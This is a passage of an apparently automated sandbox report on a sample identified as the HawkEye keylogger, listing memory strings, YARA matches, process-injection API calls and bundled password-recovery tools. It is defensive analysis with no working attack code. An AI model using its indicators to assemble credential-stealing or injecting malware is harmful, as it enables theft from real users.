              Source: vbc.exe, 00000007.00000003.281794545.0000000000C5D000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
              Source: vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=71620848v
              Source: vbc.exe, 00000007.00000003.281794545.0000000000C5D000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
              Source: vbc.exe, 00000007.00000003.281794545.0000000000C5D000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.
              Source: vbc.exe, 00000007.00000003.282033298.0000000000B7B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
              Source: vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=57232382215=
              Source: vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/login.srf?B
              Source: vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
              Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
              Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/ILLMEMhZ
              Source: vbc.exe, 00000007.00000002.282758861.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6504, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6712, type: MEMORY
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.308b314.5.raw.unpack, type: UNPACKEDPE
              Contains functionality to log keystrokes (.Net Source)Show sources
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.Vkdr225E85.exe.308b314.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              .NET source code contains very large stringsShow sources
              Source: Vkdr225E85.exe, frmLogin.csLong String: Length: 13656
              Source: 1.2.Vkdr225E85.exe.b80000.0.unpack, frmLogin.csLong String: Length: 13656
              Source: 1.0.Vkdr225E85.exe.b80000.0.unpack, frmLogin.csLong String: Length: 13656
              Source: 4.2.Vkdr225E85.exe.b70000.4.unpack, frmLogin.csLong String: Length: 13656
              Source: 4.0.Vkdr225E85.exe.b70000.0.unpack, frmLogin.csLong String: Length: 13656
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A74 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A98 NtUnmapViewOfSection,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A8C NtSetContextThread,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073FF6F8 NtUnmapViewOfSection,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A38 NtSetContextThread,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A2C NtSetContextThread,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A20 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A08 NtUnmapViewOfSection,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A5C NtUnmapViewOfSection,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A44 NtUnmapViewOfSection,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F8A80 NtSetContextThread,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073FF910 NtSetContextThread,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073FF858 NtWriteVirtualMemory,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_00B8AB56
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_0162C2B0
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_01629990
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_091B99B0
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_091B5FB0
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_00B8ABB1
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_00B8ABA0
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_00B8ABF5
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_00B8ABE4
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 1_2_00B8ABD3
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_00B76F8C
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_00B7AB56
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_0177B29C
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_0177C310
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_0177C568
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_0177B290
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_017799D0
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_0177DFD0
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073FB620
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F2360
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F1F30
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F1EA8
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073FED30
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F6B20
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F9BB8
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F2BA8
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F3BE8
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F9958
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F3BD7
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_00B7ABB1
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_00B7ABA0
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_00B7ABF5
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_00B7ABE4
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_00B7ABD3
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404DDB
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040BD8A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404E4C
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404EBD
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404F4E
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00404419
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00404516
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00413538
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004145A1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0040E639
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004337AF
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004399B1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0043DAE7
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00405CF6
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00403F85
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411F99
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
              Source: Vkdr225E85.exeBinary or memory string: OriginalFilename vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.255460083.0000000000B82000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCONSOLESCREENBUFFERINFO.exe. vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.270888811.0000000008D50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Vkdr225E85.exe
              Source: Vkdr225E85.exeBinary or memory string: OriginalFilename vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000004.00000002.502829313.0000000000482000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs Vkdr225E85.exe
              Source: Vkdr225E85.exe, 00000004.00000000.254268218.0000000000B72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCONSOLESCREENBUFFERINFO.exe. vs Vkdr225E85.exe
              Source: Vkdr225E85.exeBinary or memory string: OriginalFilenameCONSOLESCREENBUFFERINFO.exe. vs Vkdr225E85.exe
              Source: Vkdr225E85.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000004.00000002.513535332.0000000007600000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000004.00000002.513457560.00000000075A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.Vkdr225E85.exe.7600000.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.Vkdr225E85.exe.75a0000.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.Vkdr225E85.exe.30a2f34.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.Vkdr225E85.exe.308b314.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.Vkdr225E85.exe.308b314.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: Vkdr225E85.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
